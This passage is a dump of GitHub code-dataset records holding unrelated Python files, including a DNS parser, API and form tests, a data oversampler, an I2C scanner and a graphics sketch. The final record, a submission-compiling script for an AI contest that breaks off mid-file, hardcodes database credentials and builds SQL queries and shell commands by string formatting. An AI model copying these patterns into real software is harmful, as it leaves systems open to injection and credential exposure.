192:\n\t\t\tmx += str_from_pointer(response, response[i+1])\n\t\t\ti+=1\n\t\telif x in range(0, 16):\n\t\t\tmx += \".\"\n\t\telse:\n\t\t\tmx += chr(response[i])\n\treturn res[:-1],str(preference)+\" \"+mx[1:-1]\n\ndef get_TXT(response,start):#also same for CNAME\n\tres=\"\";txt=\"\";\n\tif(response[start] == 192):\n\t\tres += str_from_pointer(response, response[start+1])\n\t\t\t\t\t\n\tstart = start+12\n\ttxt = str_from_pointer(response, start)\t\n\treturn res[:-1],txt[:-1]\n\ndef get_time(response,start):\n\tt1 = response[start]; t2 = response[start+1]\n\tt3 = response[start+2]; t4 = response[start+3]\n\tttl = int(t1)*(16**6) + int(t2)*(16**4) + int(t3)*(16**2)+int(t4)\n\treturn ttl\n\ndef get_SOA(response,start):\n\tres=\"\";\n\tif(response[start] == 192):\n\t\tres += str_from_pointer(response, response[start+1])\n\t\t\t\t\t\n\tlength = response[start+11]\t\t\n\tstart = start+12\n\tpns = \"\" #primary name server\n\tram = \"\" #responsible authority's mailbox\n\tmt = get_time(response,start+length-4)#minimum ttl\n\tel = get_time(response,start+length-8)#expire limit\n\trti = get_time(response,start+length-12)#retry interval\n\trfi = get_time(response,start+length-16)#refresh interval\n\tsn = get_time(response,start+length-20)#serial number\n\tfor i in range(start,start+length-20):\n\t\tx = response[i]\n\t\tif x == 192:\n\t\t\tpns += \".\"+str_from_pointer(response, response[i+1])\n\t\t\ti+=2\n\t\t\tbreak\n\t\telif x in range(0, 16):\n\t\t\tpns += \".\"\n\t\telse:\n\t\t\tpns += chr(response[i])\n\n\tfor j in range(i,start+length-20):\n\t\tx = response[j]\n\t\tif x == 192:\n\t\t\tram += \".\"+str_from_pointer(response, response[j+1])\n\t\t\tbreak\n\t\telif x in range(0, 16):\n\t\t\tram += \".\"\n\t\telse:\n\t\t\tram += chr(response[j])\n\treturn res[:-1],pns[1:-1],ram[1:-1],sn,rfi,rti,el,mt\n\ndef get_PTR(response,start):\n\taddr=\"\";name=\"\";\n\tif(response[start] == 192):\n\t\taddr += str_from_pointer(response, response[start+1])\n\t\t\t\t\t\n\tlength = response[start+11]\t\t\n\tstart = start+12\n\tfor i in range(start,start+length):\n\t\tx = response[i]\n\t\tif x == 192:\n\t\t\tname += str_from_pointer(response, response[i+1])\n\t\t\ti+=1\n\t\telif x in range(0, 16):\n\t\t\tname += \".\"\n\t\telse:\n\t\t\tname += chr(response[i])\n\treturn addr[1:],name[1:]\n\ndef get_query_details(query):\n\tlength = len(query)\n\tstart = 12\n\tst = \"\"\n\twhile start < length:\n\t\tsize = query[start]\n\t\tif(size == 0):\n\t\t\tbreak\n\t\tfor j in range(1,size+1):\n\t\t\tst += chr(query[start+j])\n\t\tst += \".\"\n\t\tstart += size+1\n\ttype = query[start+2]\n\tclas = query[start+4]\n\tstart += 5\n\treturn st[:len(st) - 1] ,type, clas, start\n","repo_name":"amodn08/CN-project","sub_path":"library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26659128477","text":"# Questions Marks\n# Have the function QuestionsMarks(str) take the str string parameter, which will contain single digit numbers, letters, and question marks, and check if there are exactly 3 question marks between every pair of two numbers that add up to 10. If so, then your program should return the string true, otherwise it should return the string false. If there aren't any two numbers that add up to 10 in the string, then your program should return false as well.\n# For example: if str is \"arrb6???4xxbl5???eee5\" then your program should return true because there are exactly 3 question marks between 6 and 4, and 3 question marks between 5 and 5 at the end of the string.\ndef QuestionsMarks(strParam):\n a = -1\n b = -1\n c = 0\n count = 0\n lst = list(strParam)\n while count != len(lst):\n for i in lst:\n count = count + 1\n if i.isnumeric() and c==1:\n c = c + 1\n b = lst.index(i)\n if i.isnumeric() and c==0:\n c = c + 1\n a = lst.index(i)\n if c==2 and (int(lst[a])+int(lst[b]))==10:\n c=0\n d = a + 1\n lst1 = lst[d:b]\n charCount = 0\n for s in lst1:\n charCount += s.count(\"?\")\n if charCount == 3:\n return \"true\"\n return \"false\"\n\nprint(QuestionsMarks(input()))","repo_name":"ehsanshaikh/python_cb_hr_practice","sub_path":"4-Question_Marks.py","file_name":"4-Question_Marks.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23696997257","text":"import pytest\nfrom fastapi.testclient import TestClient\n\nfrom main import app\n\nquestionanswer = {\n \"question\": \"What kind of bear is best?\",\n \"answers\": {'A': \"That's a ridiculous question.\",\n 'B': \"Black bear\"},\n\n \"correctAnswer\": 'B'\n}\n\nclient = TestClient(app)\n\n\n@pytest.mark.asyncio\nasync def test_should_create_questionanswer():\n response = client.post(\"/question\", json=questionanswer)\n assert response.status_code == 200\n assert response.json()['data'][0]['question'] == 'What kind of bear is best?'\n\n\n@pytest.mark.asyncio\nasync def test_should_return_all_questionaswers():\n response = client.get(\"/question\")\n assert response.status_code == 200\n\n\n@pytest.mark.asyncio\nasync def test_should_return_http_code_400_and_invalid_question_id():\n response = client.get(\"/question/123\")\n assert response.status_code == 400\n assert response.json()['detail'] == 'Invalid question id'\n\n\n@pytest.mark.asyncio\nasync def test_should_not_find_question_by_id():\n question_id = \"624ed6ac8a361b879616f878\"\n response = client.get(f\"/question/{question_id}\")\n assert response.status_code == 404\n assert response.json()['detail'] == f\"Could not find question with id: {question_id}.\"\n","repo_name":"Wonziak/PollingTool","sub_path":"test/Routers/test_question_router.py","file_name":"test_question_router.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13568246110","text":"from sklearn.neighbors import NearestNeighbors\nfrom scipy.ndimage import uniform_filter\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport sys, math, io, os\nfrom collections import Counter\n\n\nclass ts_oversampler:\n '''\n timeseries_oversampler.ts_oversampler::Class containing the building blocks for \n the oversampling algorithm, allowing for fine-grained control when needed\n '''\n def generate_new_lengths(self, timeseries, ts_num=1, window_size=6, X=10, fixed_len=True, seed=1):\n ''' \n timeseries_oversampler.ts_oversampler().generate_new_lengths::Generate the lengths for each of the synthetic timeseries\n \n :param timeseries: list\n timeseries given as a list\n :param ts_num: int\n number of synthetic timeseries lengths to be produced\n :param window_size: int\n network hyperparameters\n :param X: int\n boundary for uniform randomization of the generated lengths\n :param fixed_len: bool\n don't randomize the new lengths if True\n :param seed: int\n random seed\n \n :return: list\n new lengths\n '''\n np.random.seed(seed)\n window_ts_lengths = [len(ts) for ts in timeseries]\n\n windows = [[] for _ in range(int(max(window_ts_lengths)/window_size) + 1)]\n for ts_len in window_ts_lengths:\n window_pos = int(ts_len/window_size)\n windows[window_pos].append(ts_len)\n\n # compute the percentage of total timeseries in each window\n tot_ts = len(timeseries)\n prob = [len(window)/tot_ts for window in windows]\n\n # generate random lengths based on percentages computed above; new_lengths contains pairs in the form: (reference_ts_index_within_window, new_length)\n new_lengths = []\n for rand_window in np.random.choice(list(range(len(prob))), ts_num, p=prob):\n # choose a random reference ts within the chosen time window\n ts_in_window = windows[rand_window]\n reference_ts_pos = np.random.randint(len(ts_in_window))\n new_len = ts_in_window[reference_ts_pos]\n if not fixed_len:\n new_len += np.random.uniform(-X, X)\n # length cannot be lower or higher than this window bounds\n if new_len < rand_window*window_size:\n new_len = rand_window*window_size\n elif new_len >= (rand_window + 1)*window_size:\n new_len = (rand_window + 1)*window_size - 1\n\n new_lengths.append((reference_ts_pos, int(new_len)))\n\n return new_lengths\n\n def random_point_in_d_ball(self, point, radius=-1, seed=1):\n ''' \n timeseries_oversampler.ts_oversampler().random_point_in_d_ball::Muller algorithm for sampling a random point in a ball of radius d\n \n :param point: list\n point coordinates given as a list\n :param radius: int\n radius in which the point is sampled; if -1, the point will be sampled with a uniform distribution\n :param seed: int\n random seed\n \n :return: list\n sampled point\n '''\n np.random.seed(seed)\n # Muller algorithm\n d = len(point)\n u = np.random.normal(0, 1, d) # an array of d normally distributed random variables\n norm = np.sum(u**2)**(0.5)\n if radius > -1:\n x = [ax*(point[i]*radius) for i, ax in enumerate(u)]/norm # r*u/norm\n else:\n r = np.random.uniform()**(1.0/d) # radius*np.random.uniform()**(1.0/d)\n x = r * u / norm\n\n return [x[i]+v for i, v in enumerate(point)]\n\n def get_centroid(self, points):\n ''' \n timeseries_oversampler.ts_oversampler().get_centroid::Get the centroid of a list of points\n \n :param points: list\n points for which the centroid has to be found\n \n :return: list\n centroid point\n '''\n centroid = [[] for _ in points[0]]\n l = len(points)\n\n for point in points:\n for axis, val in enumerate(point):\n centroid[axis].append(val)\n\n return [sum(values)/l for values in centroid]\n\n def pad_timeseries(self, timeseries, resulting_length):\n ''' \n timeseries_oversampler.ts_oversampler().pad_timeseries::Pad the synthetic timeseries to a target length\n \n :param timeseries: list\n timeseries to pad\n :param resulting_length: int\n target length\n\n :return: list\n padded timeseries\n '''\n if len(timeseries) == resulting_length:\n return timeseries\n iterations = abs(len(timeseries) - resulting_length)\n padded_ts = timeseries\n for i in range(iterations):\n # Replicate first element\n if i % 2 == 0:\n padded_ts = [padded_ts[0]] + padded_ts\n # Replicate last element\n else:\n padded_ts = padded_ts + [padded_ts[-1]]\n return padded_ts\n \n def oversample_timeseries(self, timeseries, window_size=60, ts_num=1, X=8, normal_sd=3.33, sliding_window=3, d=0.01, seed=1):\n ''' \n timeseries_oversampler.ts_oversampler().oversample_timeseries::Obtain new synthetic timeseries from a list of timeseries\n \n :param timeseries: list\n timeseries to oversample\n :param window_size: int\n window size\n :param ts_num: int\n number of synthetic timeseries to produce\n :param X: int\n boundary for uniform randomization of the generated lengths\n :param normal_sd: int\n standard deviation for normal distribution\n :param sliding_window: int\n sliding window size\n :param d: int\n radius for Muller algorithm\n :param seed: int\n random seed\n\n :return: list\n synthetic timeseries\n :return: list\n synthetic timeseries lengths\n '''\n np.random.seed(seed)\n new_lengths = sorted(self.generate_new_lengths(timeseries, ts_num=ts_num, window_size=window_size, X=X, seed=seed))\n # sort time series based on timeseries lengths\n timeseries.sort(key=len)\n\n synthetic_timeseries = []\n\n for w in range(int(len(timeseries[-1]) / window_size) + 1):\n window_ts = [ts for ts in timeseries if w * window_size <= len(ts) < (w + 1) * window_size] # original timeseries in this window\n window_ts_lengths = [len(ts) for ts in window_ts] # original timeseries lenghts\n window_new_lengths = []\n window_ts_references = []\n\n for ts_len in new_lengths: # for each new synthetic time series get thos in this window\n if w * window_size <= ts_len[1] < (w + 1) * window_size:\n window_ts_references.append(ts_len[0])\n window_new_lengths.append(ts_len[1])\n\n # skip windows where there are no reference timeseries and any new timeseries to create (second check should be always false if there are no reference ts)\n if len(window_ts) > 0 and len(window_new_lengths) > 0:\n # in the first snapshot for each reference ts get a random neighbour and compute a third point between these two\n first_snapshot_points = [ts[0] for ts in window_ts]\n\n # ----- COMPUTE NEW TIMESERIES STARTING POINTS -----\n\n # array with starting points for each new timeseries to create\n starting_points = [None for _ in window_new_lengths]\n\n # for each reference timeseries assign its first point to its paired synthetic timeseries\n for i, _ in enumerate(window_ts_lengths):\n for j, pos in enumerate(window_ts_references):\n if pos == i:\n starting_points[j] = first_snapshot_points[i]\n\n # ----- GENERATE POINTS FOR NEW TIMESERIES -----\n\n # values for new ts based on their reference ts\n generated_points = [[window_ts[window_ts_references[i]][0]] for i, _ in enumerate(window_new_lengths)]\n # value of new ts starting from the chosen starter\n new_ts = [[starting_points[i]] for i, _ in enumerate(window_new_lengths)]\n\n for snapshot in range(1, len(window_ts[-1])):\n # all values from all the timeseries which have a value in this position\n points = [ts[snapshot] for ts in window_ts if len(ts) > snapshot]\n\n for ts_pos, ts_length in enumerate(window_new_lengths):\n if snapshot < ts_length:\n # reference ts for this new ts\n reference_ts = window_ts[window_ts_references[ts_pos]]\n\n # pick a reference value from reference ts with normal distribution around snapshot (both from past or from future)\n pos = int(np.random.normal(snapshot, normal_sd, 1)[0])\n if pos < 0:\n pos *= -1\n elif pos >= len(reference_ts):\n pos -= pos - (len(reference_ts) - 1)\n reference_ts_value = reference_ts[pos]\n\n # sample a point around the randomly chosen one\n dball_point = self.random_point_in_d_ball(reference_ts_value, d, seed=seed)\n # add the difference between this new point and the last generated to the actual new ts\n new_point = [round(new_ts[ts_pos][-1][ax]+(dball_point[ax]-generated_points[ts_pos][-1][ax]), 4) for ax, _ in enumerate(dball_point)]\n\n new_ts[ts_pos].append(new_point)\n generated_points[ts_pos].append(dball_point)\n\n # ----- MOVING AVERAGE -----\n moving_averages = []\n for j in range(len(new_ts)):\n moving_averages.append([self.get_centroid(new_ts[j][i-sliding_window:i]) for i in range(sliding_window, len(new_ts[j]))])\n\n synthetic_timeseries.extend(moving_averages)\n\n return synthetic_timeseries, new_lengths\n\n def oversample_and_pad(self, src_data, class_to_oversample, ts_num=1, sl_wnd=3, seed=1):\n ''' \n timeseries_oversampler.ts_oversampler().oversample_and_pad::Obtain new synthetic timeseries from a list of timeseries\n \n :param src_data: list\n timeseries list to oversample\n :param class_to_oversample: int\n class integer label\n :param ts_num: int\n number of synthetic timeseries to produce\n :param sl_wnd: int\n sliding window size for the oversampling algorithm\n :param seed: int\n random seed\n\n :return: pandas DataFrame\n synthetic timeseries organized in a table with 'Values' (X) and 'Class' (y) columns\n '''\n synth_ts_list = []\n class_list = []\n \n new_ts, new_len = self.oversample_timeseries(src_data, ts_num=ts_num, sliding_window=sl_wnd, seed=seed)\n \n for i in range(ts_num): \n padded_ts = self.pad_timeseries(new_ts[i], new_len[i][1])\n synth_ts_list.append(padded_ts)\n class_list.append(class_to_oversample)\n \n data = [synth_ts_list, class_list]\n final_df = pd.DataFrame()\n final_df = final_df.append(data).T\n \n final_df.columns=['Values', 'Class']\n \n return final_df\n\ndef gather_and_preprocess_data(_src_df_name, type_labels):\n ''' \n timeseries_oversampler.gather_and_preprocess_data::Gather, preprocess the\n data and cache it\n \n :param _src_df_name: str\n filename of the csv file containing the raw data\n\n :return: pandas DataFrame\n preprocessed data in a DataFrame with 'Values' (X) and 'Class' (y)\n columns\n '''\n\n df = pd.read_csv(_src_df_name)\n \n df['Values'] = df['Values'].apply(lambda x: np.fromstring(x, dtype=float, sep=';'))\n i = 0\n class_i = 0\n \n class_values = pd.DataFrame(data=[df['ID_TimeSeries'], df[type_labels]]).T\n class_values.columns = ['ID_TimeSeries', type_labels]\n data = []\n shapes = []\n \n range_len = len(df['ID_TimeSeries'].unique())\n for k in range(range_len):\n shapes.append(df.iloc[k]['Values'].shape[0])\n \n minimum_shape = min(shapes)\n\n\n for _ in range(range_len):\n current_matrix = pd.DataFrame(data=[\n df.iloc[i]['Values'], df.iloc[i+1]['Values'], df.iloc[i+2][\n 'Values'], df.iloc[i+3]['Values']]\n ).T.to_numpy()[:minimum_shape,:].tolist()\n\n\n data.append([class_i//4, current_matrix, class_values.iloc[class_i][type_labels]])\n i += 4\n class_i += 4\n\n\n final_df = pd.DataFrame()\n final_df = final_df.append(data)\n final_df.columns=['ID_TimeSeries', 'Values', 'Class']\n del final_df['ID_TimeSeries']\n\n return final_df\n\n\n\ndef augment_ts_dataset(_src_df, _percentage=0, _merge_sets=True, _seed=1):\n ''' \n timeseries_oversampler.augment_ts_dataset::Obtain a new dataset with synthetic timeseries\n \n :param _src_df: pandas DataFrame\n dataset to augment\n :param _percentage: int\n percentage of augmentation, if set to 0 the service will just balance every class to the one with the highest cardinality\n :param _merge_sets: bool\n if True, the source DataFrame will be merged to the synthetic one\n :param _seed: int\n random seed\n\n :return: pandas DataFrame\n synthetic timeseries organized in a table with 'Values' (X) and 'Class' (y) columns\n '''\n oversampler = ts_oversampler()\n \n #_src_df = gather_and_preprocess_data(_src_df_name)\n data_list = []\n\n if _merge_sets:\n data_list.append(_src_df)\n\n counter = Counter(_src_df['Class'].tolist())\n _percentage += 100\n max_cardinality = counter.most_common()[0][1] * (_percentage/100) \n num_classes = len(counter)\n \n # Oversample class by class: this allows for keeping a \n # coherent trend between real and synthetic timeseries wrt each class\n for index in range(num_classes):\n current_class = counter.most_common()[index][0]\n current_aug = round(max_cardinality - counter.most_common()[index][1])\n \n current_class_to_augment_df = _src_df.loc[_src_df['Class'] == int(current_class)]\n \n print(\"Trying to augment class labeled \\\"{}\\\" by {} samples...\".format(\n current_class, current_aug))\n current_augmented_class = oversampler.\\\n oversample_and_pad(current_class_to_augment_df['Values'].tolist(\n ), current_class, ts_num=current_aug, seed=_seed)\n print(\"Class labeled \\\"{}\\\" augmented!\".format(current_class))\n\n data_list.append(current_augmented_class)\n\n augmented_df = pd.concat(data_list)\n augmented_df.reset_index()\n\n # Plot the histogram\n # Before\n fig = plt.figure(figsize=(12,8))\n plt.xlabel('Class', fontsize=20)\n plt.ylabel('Number of Samples', fontsize=20)\n arr = _src_df['Class'].array\n labels, counts = np.unique(arr, return_counts=True)\n plt.bar(labels, counts, align='center', edgecolor=\"black\")\n plt.gca().set_xticks(labels)\n\n # After\n fig = plt.figure(figsize=(12,8))\n plt.xlabel('Class', fontsize=20)\n plt.ylabel('Number of Samples', fontsize=20)\n arr = augmented_df['Class'].array.astype(int)\n labels, counts = np.unique(arr, return_counts=True)\n plt.bar(labels, counts, align='center', edgecolor=\"black\")\n plt.gca().set_xticks(labels)\n\n return augmented_df\n","repo_name":"andreafuschino/Time-series-Metric-Learning","sub_path":"timeseries_oversampler.py","file_name":"timeseries_oversampler.py","file_ext":"py","file_size_in_byte":15956,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"30511802962","text":"# coding=utf-8\n\nimport ftplib\n\nf = ftplib.FTP('localhost')\nf.login('windard','windard')\n\n#以二进制格式上传\nlocalfile1 = open('demo.tar.gz','rb')\nf.storbinary('STOR demo.tar.gz',localfile1)\nlocalfile1.close()\n\n#以ASCII格式上传\nlocalfile2 = open('demo.txt','r')\nf.storlines('STOR demo.txt',localfile2)\nlocalfile2.close()\n\nf.quit()\n\n","repo_name":"windard/Python_Lib","sub_path":"code/ftplib_upload.py","file_name":"ftplib_upload.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"68"} +{"seq_id":"6352361389","text":"import shutil\nimport tempfile\nfrom http import HTTPStatus\n\nfrom django.conf import settings\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.test import Client, TestCase, override_settings\nfrom django.urls import reverse\n\nfrom ..models import Comment, Post, User\n\nAPP_NAME = \"posts\"\n\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\n\n@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)\nclass FormTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create(username=\"test\")\n\n cls.post = Post.objects.create(\n text=\"Текст\",\n author=cls.user,\n )\n\n cls.post_image_text = \"Текст с картинкой\"\n cls.post_image_small_gif = (\n b\"\\x47\\x49\\x46\\x38\\x39\\x61\\x02\\x00\"\n b\"\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00\"\n b\"\\xFF\\xFF\\xFF\\x21\\xF9\\x04\\x00\\x00\"\n b\"\\x00\\x00\\x00\\x2C\\x00\\x00\\x00\\x00\"\n b\"\\x02\\x00\\x01\\x00\\x00\\x02\\x02\\x0C\"\n b\"\\x0A\\x00\\x3B\"\n )\n\n cls.comment_text = \"Комментарий\"\n cls.comment_text_modified = \"Текст измененный\"\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n def setUp(self):\n self.client = Client()\n self.client.force_login(FormTests.user)\n\n def entities_creation_post(self):\n count = Post.objects.count()\n\n image = SimpleUploadedFile(\n name=\"small.gif\",\n content=FormTests.post_image_small_gif,\n content_type=\"image/gif\",\n )\n\n response = self.client.post(\n reverse(f\"{APP_NAME}:post_create\"),\n data={\n \"text\": FormTests.post_image_text,\n \"image\": image,\n },\n follow=True,\n )\n\n self.assertEqual(Post.objects.count(), count + 1)\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n self.assertTrue(\n Post.objects.filter(\n text=FormTests.post_image_text,\n image=f\"{APP_NAME}/{image.name}\",\n ).exists()\n )\n\n def entities_creation_comment(self):\n count = Comment.objects.count()\n\n response = self.client.post(\n reverse(\n f\"{APP_NAME}:add_comment\", kwargs={\"pk\": FormTests.post.id}\n ),\n data={\n \"text\": FormTests.comment_text,\n },\n follow=True,\n )\n\n self.assertEqual(Comment.objects.count(), count + 1)\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n self.assertTrue(\n Comment.objects.filter(text=FormTests.comment_text).exists()\n )\n\n def test_entities_creation(self):\n \"\"\"\n Отправка валидной формы со страниц создания поста и комментария поста.\n \"\"\"\n self.entities_creation_post()\n self.entities_creation_comment()\n\n def entities_modification_post(self):\n response = self.client.post(\n reverse(\n f\"{APP_NAME}:post_update\", kwargs={\"pk\": FormTests.post.id}\n ),\n data={\n \"text\": FormTests.comment_text_modified,\n },\n follow=True,\n )\n\n self.assertEqual(\n Post.objects.get(pk=FormTests.post.id).text,\n FormTests.comment_text_modified,\n )\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_entities_modification(self):\n \"\"\"\n Отправка валидной формы со страницы редактирования поста.\n \"\"\"\n self.entities_modification_post()\n","repo_name":"bitbybit/hw05_final","sub_path":"yatube/posts/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36528114334","text":"\"\"\"Unit tests for cli/enqueue_task.py\"\"\"\n# pylint: disable=no-self-use,protected-access\nfrom multiprocessing import JoinableQueue\nimport time\nfrom typing import Any, Dict\nimport unittest\nfrom unittest import mock\n\nimport boto3\n\nfrom cli import enqueue_task\n\n\nclass MockQueue:\n \"\"\"Mock SQS queue which fails half of the messages it sends.\"\"\"\n\n def __init__(self):\n self._calls = []\n\n def send_messages(self, **kwargs) -> Dict[str, Any]:\n \"\"\"Even messages send successfully, odd are failures\"\"\"\n entries = kwargs['Entries']\n self._calls.append(entries)\n result = {\n 'Successful': [],\n 'Failed': []\n }\n\n for i, entry in enumerate(entries):\n if i % 2 == 0:\n result['Successful'].append({'Id': entry['Id']})\n else:\n result['Failed'].append({'Id': entry['Id']})\n return result\n\n\nclass MockTask:\n \"\"\"Mock executable task for worker process\"\"\"\n\n @staticmethod\n def run(queue: Any) -> None:\n pass\n\n\nclass EnqueueTaskTest(unittest.TestCase):\n \"\"\"Unit tests for EnqueueTask class.\"\"\"\n\n @mock.patch.object(time, 'sleep')\n def test_task_run(self, mock_sleep: mock.MagicMock) -> None:\n \"\"\"Execute the task - messages send to queue, retrying on failure\"\"\"\n queue = MockQueue()\n task = enqueue_task.EnqueueTask(['A', 'B', 'C', 'D', 'E'])\n task.run(queue)\n\n # Failed messages should be retried\n expected = [\n [\n {'Id': '0', 'MessageBody': 'A'},\n {'Id': '1', 'MessageBody': 'B'},\n {'Id': '2', 'MessageBody': 'C'},\n {'Id': '3', 'MessageBody': 'D'},\n {'Id': '4', 'MessageBody': 'E'},\n ],\n [\n {'Id': '0', 'MessageBody': 'B'},\n {'Id': '1', 'MessageBody': 'D'},\n ],\n [\n {'Id': '0', 'MessageBody': 'D'},\n ]\n ]\n self.assertEqual(expected, queue._calls)\n mock_sleep.assert_called()\n\n\nclass WorkerTest(unittest.TestCase):\n \"\"\"Unit tests for Worker class.\"\"\"\n\n @mock.patch.object(boto3, 'resource')\n def test_worker_run(self, mock_resource: mock.MagicMock) -> None:\n \"\"\"A worker process should iterate over the task queue\"\"\"\n task_queue = JoinableQueue()\n worker = enqueue_task.Worker('queue_name', task_queue)\n mock_resource.assert_called()\n\n # Add mock task to queue, followed by None\n task_queue.put(MockTask())\n task_queue.put(None)\n\n # Worker process should terminate and the task queue should be empty\n worker.run()\n task_queue.join()\n","repo_name":"airbnb/binaryalert","sub_path":"tests/cli/enqueue_task_test.py","file_name":"enqueue_task_test.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":1369,"dataset":"github-code","pt":"68"} +{"seq_id":"13556638686","text":"import machine\n \nsdaPIN=machine.Pin(18) \nsclPIN=machine.Pin(19)\n \ni2c=machine.I2C(1,sda=sdaPIN, scl=sclPIN, freq=400000) \n \ndevices = i2c.scan()\nif len(devices) == 0:\n print('14CORE - i2c Finder / Scanner ')\n print(\"Error: No i2c device found, check properly the wiring!\")\nelse:\n print('14CORE - i2c Finder / Scanner ')\n print('i2c devices found:',len(devices))\nfor device in devices:\n print(\"i2C Address: \",hex(device))","repo_name":"fran-janela/pfe-embedded-system","sub_path":"bme280/i2C_scanner.py","file_name":"i2C_scanner.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13652273569","text":"\"\"\"2023-04-28\"\"\"\nfrom helpers import HEIGHT\nfrom helpers import save_frame\nfrom helpers import save_gif\nfrom helpers import tmp_path\nfrom helpers import WIDTH\nfrom helpers import write_legend\nfrom pathlib import Path\n\nimport py5\n\n\nIMG_NAME = Path(__file__).name.replace(\".py\", \"\")\n\nFUNDO = py5.color(248, 254, 200)\n\nPATH = tmp_path()\n\nFRAMES = []\n\n\ndef settings():\n py5.size(WIDTH, HEIGHT)\n\n\ndef setup():\n py5.background(FUNDO)\n py5.frame_rate(3)\n\n\ndef shape(xi, yi, xf, yf, largura, cor):\n largura = largura / 2\n noise = largura / 3\n xi0 = xi - largura\n xi1 = xi + largura\n xf0 = xf - largura\n xf1 = xf + largura\n py5.no_stroke()\n py5.fill(*cor)\n yi = int(yi)\n yf = int(yf)\n with py5.begin_shape():\n py5.vertex(xi0, yi)\n py5.vertex(xi1, yi)\n for y in range(yi, yf, -3):\n x = py5.random(-noise, noise) + xi1\n py5.vertex(x, y)\n py5.vertex(xf1, yf)\n py5.vertex(xf0, yf)\n for y in range(yf, yi, 3):\n x = py5.random(-noise, noise) + xf0\n py5.vertex(x, y)\n\n\ndef galho(y, tamanho, encurtamento, limite, atual=0):\n stroke_weight = tamanho / 10\n if stroke_weight < 1.2:\n cor = (60, 180, 0)\n else:\n cor = (66, 40, 14)\n shape(0, y, 0, y - tamanho, stroke_weight, cor)\n atual += 1\n angulo = py5.radians(17)\n if atual < limite and tamanho > 5:\n encurtamento -= 0.01\n with py5.push_matrix():\n py5.translate(0, y - tamanho)\n py5.rotate(angulo)\n galho(\n 0, (tamanho * encurtamento) - py5.random(3), encurtamento, limite, atual\n )\n py5.rotate(2 * -angulo)\n galho(\n 0, (tamanho * encurtamento) - py5.random(3), encurtamento, limite, atual\n )\n\n\ndef draw():\n diametro = 10\n py5.background(FUNDO)\n write_legend([\"#000000\"], IMG_NAME)\n angulo = 30\n passos = 360 // angulo\n frame = py5.frame_count\n with py5.push_matrix():\n py5.translate(WIDTH / 2, HEIGHT / 2)\n py5.rotate(py5.radians(frame))\n for passo in range(0, passos):\n tamanho = 80 if passo % 2 else 60\n encurtamento = 0.85 if passo % 2 else 0.95\n galho(-diametro, tamanho, encurtamento, limite=frame)\n py5.rotate(py5.radians(angulo))\n FRAMES.append(save_frame(PATH, IMG_NAME, frame))\n py5.window_title(f\"FR: {py5.get_frame_rate():.1f} | Frame Count: {frame}\")\n\n\ndef key_pressed():\n if py5.key == \" \":\n py5.no_loop()\n print(f\"Saving {len(FRAMES)} frames\")\n save_gif(IMG_NAME, FRAMES, loop=None)\n py5.exit_sketch()\n\n\npy5.run_sketch()\n","repo_name":"ericof/sketch-a-day","sub_path":"2023-05-01.py","file_name":"2023-05-01.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"68"} +{"seq_id":"32760115600","text":"import mysql.connector\nimport time\nimport sys\nimport os\nimport shutil\nimport urllib.request\n\ndef db_connect():\n user='root'\n pwd='metis'\n host='localhost'\n db='db_ai'\n try:\n database=mysql.connector.connect(user=user,password=pwd,host=host,database=db)\n except mysql.connector.Error as err:\n print(\"connect database failed.\")\n print(\"Error: {}\".format(err.msg))\n sys.exit()\n return database\n\nfile_root=\"b:\\\\\"\ncom_root=\"b:\\com\\\\\"\n\ndef create_directory(a,b):\n if not os.path.exists(str(a)+str(b)):\n os.mkdir(str(a)+str(b))\n\ndef compile_code(uid,version,code):\n create_directory(file_root,uid);\n path=file_root+\"\\\\\"+str(uid)\n os.chdir(path)\n \n f=open(str(version)+\".cpp\",\"w\");\n f.write(code);\n f.close();\n\n os.chdir(com_root)\n f=open(str(version)+\".cpp\",\"w\");\n f.write(code);\n f.close();\n if os.system(\"g++ {0}.cpp -o {0} 2> compileinfo\".format(str(version)))!=0:\n shutil.copy(\"compileinfo\",path+\"\\\\compileinfo{}.txt\".format(version))\n return False\n #compile error\n shutil.copy(\"{}.exe\".format(str(version)),path)\n return True\n\ndef change_status(db,pid,status,status_description=\"\"):\n sql=\"update tProg set status_code='{0}',status='{2}' where PID='{1}'\".format(status,pid,status_description)\n print(sql)\n c=db.cursor();\n c.execute(sql)\n\ndef query_tProg(db):\n c=db.cursor();\n sql=\"select PID,code,UID,version from tProg where status_code='0' order by submitted_on asc limit 0,1\";\n a=c.execute(sql);\n for row in c.fetchall():\n pid=row[0]\n code=urllib.request.unquote(row[1])\n uid=row[2]\n version=row[3]\n change_status(db,pid,1)\n if compile_code(uid,version,code):\n change_status(db,pid,2,\"0%\")\n #create_bettle()\n else:\n 